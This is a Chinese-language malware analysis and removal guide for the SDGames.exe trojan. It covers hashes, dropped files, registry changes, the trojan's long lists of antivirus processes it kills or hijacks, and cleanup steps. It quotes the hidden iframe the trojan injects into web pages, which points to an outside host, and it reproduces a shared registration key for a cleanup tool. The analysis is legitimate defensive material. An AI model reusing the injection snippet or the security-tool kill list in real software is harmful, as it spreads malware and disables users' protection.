SDGames.exe

在每個磁碟分區釋放SDGames.exe和AUTORUN.INF 達到通過隨身碟傳播的目的

並且在每個分區釋放Windows.url,新建資料夾·url,Recycleds.url指向該分區根目錄下的SDGames.exe

惡性病毒 SDGames.exe(小瓢蟲)

檔案名稱稱:SDGames.exe

檔案大小:59282 byte

A V命名:

Trojan.Win32.VB.yth(瑞星)

Trojan-Downloader.Win32.VB.lg(卡巴斯基)

Win32.Troj.Downloader.vb.237568(金山)

加殼方式:北斗4.1

編寫語言:Microsoft Visual Basic 5.0 / 6.0

檔案MD5:fc334ffcf5aff3ca8235705d61f62990

主要表現為:

1.攻擊防毒軟體之後進行IFEO映像劫持

2.感染htm等網頁檔案

3.感染或覆蓋exe等執行檔

4.破壞安全模式

5.破壞顯示隱藏檔案 資料夾選項等

6.修改系統時間並鎖定時間

7.可通過隨身碟等移動存儲傳播

8.關閉Windows防火牆等服務並打開許多危險服務,並使得用戶磁碟被共享

9.後台添加賬戶並設定管理員許可權

10.修改某些檔案關聯

下面為具體分析

File: SDGames.exe

Size: 59282 bytes

File Version: 3.02

Modified: 2007年12月6日, 17:56:32

MD5: FC334FFCF5AFF3CA8235705D61F62990

SHA1: 4DFFE9E9BB666A13CC646EBA4371BDF4AFFB49BC

CRC32: 1DD096C2

1.病毒運行後,釋放如下檔案或副本

%systemroot%\system32\SDGames.exe

%systemroot%\system32\Taskeep.vbs

%systemroot%\system32\Avpser.cmd

%systemroot%\system32\netshare.cmd

%systemroot%\system32\AUTORUN.INF

在每個磁碟分區釋放SDGames.exe和AUTORUN.INF 達到通過隨身碟傳播的目的

並且在每個分區釋放Windows.url,新建資料夾.url,Recycleds.url指向該分區根目錄下的SDGames.exe

誘使用戶點擊

2.修改reg和txt檔案關聯指向%systemroot%\system32\SDGames.exe

3.刪除HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}

破壞安全模式

4.創建自啟動項目

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]

<load><%systemroot%\system32\SDGames.exe> [SDGame]

<run><%systemroot%\system32\SDGames.exe> [SDGame]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

<Winstary><%systemroot%\system32\SDGames.exe> [SDGame]

5.破壞系統的一些功能

禁用cmd:HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD

破壞顯示隱藏檔案:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue

使得檔案擴展名無法顯示:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt

隱藏控制臺:

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel

禁用註冊表編輯器

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools

禁用任務管理器

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr

修改IE主頁為:http://www.*.10mb.cn

修改IE默認頁為:wangma

隱藏資料夾選項

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions

6.關閉如下服務並將其啟動類型設為禁用

Alg

sharedaccess

wuauserv

7.開啟下列服務並將其啟動類型設為自動

Terminal Services

winmgmt

lanmanserver

8.%systemroot%\system32\netshare.cmd將用戶的所有磁碟設為共享

9.添加一個名為guest的賬戶,並將其設定為管理員許可權

10.攻擊反病毒軟體,利用Avpser.cmd強制結束一些防毒軟體進程

RavMonD.exe

RavStub.exe

Anti*

AgentSvr*

CCenter*

Rsaupd*

SmartUp*

FileDsty*

RegClean*

360tray*

360safe*

kabaload*

safelive*

KASTask*

kpFW32*

kpFW32X*

KvXP_1*

KVMonXP_1*

KvReport*

KvXP*

KVMonXP*

nter*

TrojDie*

avp.com

KRepair.COM

Trojan*

KvNative*

Virus*

Filewall*

Kaspersky*

JiangMin*

RavMonD*

RavStub*

RavTask*

adam*

cSet*

PFWliveUpdate*

mmqczj*

Trojanwall*

Ras.exe

runiep.exe

avp.exe

PFW.exe

rising*

ikaka*

.duba*

kingsoft*

木馬*

社區*

aswBoot*

MainCon*

Regs*

AVP*

Task*

regedit*

Ras*

srgui*

norton*

avp*

fire*

spy*

bullguard*

PersFw*

KAV*

ZONEALARM*

SAFEWEB*

OUTPOST*

ESAFE*

clear*

BLACKICE*

360safe.exe

Shadowservice.exe

v3webnt.exe

v3sd32.exe

v3monsvc.exe

sysmonnt.exe

hkcmd.exe

DNTUS26.EXE

AhnSD.exe

CTFMON.EXE

MonsysNT.exe

awrem32.exe

WINAW32.EXE

PNTIOMON.exe

avgw.exe

avgcc32.exe

PROmon.exe

PNTIOMON.exe

MagicSet.exe

MainCon.exe

TrCleaner.exe

WmNetPro.exe

修復*

保護*

11.映像劫持防毒軟體和一些常用工具

360rpt.exe

360Safe.exe

360tray.EXE

adam.exe

AgentSvr.exe

AppSvc32.exe

autoruns.exe

avgrssvc.exe

AvMonitor.exe

avp.com

avp.exe

CCenter.exe

ccSvcHst.exe

FileDsty.exe

FTCleanerShell.exe

HijackThis.exe

IceSword.exe

iparmo.exe

Iparmor.exe

isPwdSvc.exe

kabaload.exe

KaScrScn.SCR

KASMain.exe

KASTask.exe

KAV32.exe

KAVDX.exe

KAVPFW.exe

KAVSetup.exe

KAVStart.exe

KISLnchr.exe

KMailMon.exe

KMFilter.exe

Knod32kui.exe

KPFW32.exe

KPFW32X.exe

KPFWSvc.exe

KRegEx.exe

KRepair.COM

KsLoader.exe

KVCenter.kxp

KvDetect.exe

KvfwMcl.exe

KVMonXP.kxp

KVMonXP_1.kxp

kvol.exe

kvolself.exe

KvReport.kxp

KVScan.kxp

KVSrvXP.exe

KVStub.kxp

kvupload.exe

kvwsc.exe

KvXP.kxp

KvXP_1.kxp

KWatch9x.exe

KWatchX.exe

loaddll.exe

MagicSet.exe

MainCon.exe

mcconsol.exe

mmqczj.exe

mmsk.exe

msconfig.exe

NAVSetup.exe

nod32krn.exe

PFW.exe

PFWLiveUpdate.exe

QHSET.exe

QQ.exe

Ras.exe

Rav.exe

RavMon.exe

RavMonD.exe

RavStub.exe

RavTask.exe

RegClean.exe

rfwcfg.exe

RfwMain.exe

rfwProxy.exe

rfwsrv.exe

Rsaupd.exe

runiep.exe

safelive.exe

scan32.exe

Shadowservice.exe

shcfg32.exe

SmartUp.exe

SREng.exe

srgui.exe

symlcsvc.exe

SysSafe.exe

TrojanDetector.exe

Trojanwall.exe

TrojDie.kxp

UIHost.exe

UmxAgent.exe

UmxAttachment.exe

UmxCfg.exe

UmxFwHlp.exe

UmxPol.exe

UpLive.EXE.exe

WoptiClean.exe

zxsweep.exe

12.遍歷感染非系統分區的exe檔案(覆蓋方式)

13.遍歷感染非系統分區的jsp asp php htm html hta檔案

在其末尾加入<iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0" src="http://*.10mb.cn/" name="Myframe"

align="center" border="0">的代碼

14.修改系統時間的年份為2030年,並禁止用戶修改時間

15.隱藏系統資料夾

解決辦法:

下載sreng:http://download.kztechs.com/files/sreng2.zip

Icesword:http://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip

1.解壓縮Icesword

把Icesword改名為1.exe運行

進程中 找到SDGames.exe 右擊它 結束進程

然後點擊 Icesword左下角的 檔案 按鈕

找到如下檔案並刪除

%systemroot%\system32\SDGames.exe

%systemroot%\system32\Taskeep.vbs

%systemroot%\system32\Avpser.cmd

%systemroot%\system32\netshare.cmd

%systemroot%\system32\AUTORUN.INF

以及各個分區下面的

SDGames.exe,AUTORUN.INF,Windows.url,新建資料夾.url,Recycleds.url

2.運行sreng

(由於時間已經被改為2030年 所以sreng會彈出過期提示,不用擔心,輸入下面的授權碼即可使用)

用戶名:teyqiu

授權號:26129027541185431409013556

打開sreng後 點擊 系統修復-檔案關聯-修復

系統修復-Windows Shell/IE -全選-修復

高級修復-修復安全模式

3.還是sreng中

啟動項目 註冊表 刪除如下項目

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]

<load><%systemroot%\system32\SDGames.exe> [SDGame]

<run><%systemroot%\system32\SDGames.exe> [SDGame]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

<Winstary><%systemroot%\system32\SDGames.exe> [SDGame]

並刪除所有紅色的IFEO項目

啟動項目 System.ini

刪除Windows節點

4.取消磁碟共享

開始 運行 輸入cmd 輸入如下命令

net share c /delete

net share d /delete

...

以此類推 分別取消所有磁碟分區的共享

5.顯示系統資料夾

開始 運行 輸入cmd 輸入如下命令

attrib -h %systemroot%\system32

6.修復受感染的htm等網頁檔案

推薦使用CSI的iframkill

下載地址:http://www.vaid.cn/blog/read.php?9

相關詞條

相關搜尋

熱門詞條

聯絡我們